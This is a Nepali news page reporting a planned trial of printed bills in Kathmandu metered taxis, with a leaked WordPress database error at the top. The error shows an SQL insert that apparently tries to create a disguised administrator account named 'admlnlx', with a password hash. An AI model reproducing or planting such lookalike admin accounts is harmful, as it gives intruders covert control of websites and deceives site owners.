WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BN6UkFk40nceMiQPsp9lxtQzgMQjdo.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-16 22:11:56', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर १६–
भाडाका ट्याक्सीमा बिल प्रिन्ट हुने व्यवस्था लागू हुने भएको छ ।
प्रधानमन्त्री प्रचण्डले मिटर ट्याक्सीमा कम्प्युटर विलिङ प्रणाली लागू गर्न गत भदौ २३ गते निर्देशन दिएका थिए । त्यही निर्देशनअनुरुप नेपाल गुणस्तर तथा नापतौल विभागले मंसिर अन्तिमदेखि ट्याक्सीमा बिल प्रिन्ट हुने व्यवसथ परीक्षणका रुपमा लागू गर्ने योजना बनाएको आजको कारोबार दैनिकमा समाचार छ ।
पहिलो चरणमा काठमाडौं उपत्यकामा परीक्षणका रुपमा लागू गरिने र त्यसपश्चात क्रमिक रुपमा देशभर लागू गर्ने योजना रहेको बताए । मंसिर अन्तिमदेखि उपत्यकामा ट्याक्सी चढेपछि उपभोक्ताले प्रिन्टेड बिल पाउने वातावरण बन्ने विभागले जनाएको छ ।
कम्प्युटर विल पाउने भएपछि उपभोक्तालाई आपू ठगिएको लागेमा ट्राफिक प्रहरीमा उक्त विलका आधारमा उजुरी गर्न सकिने छ ।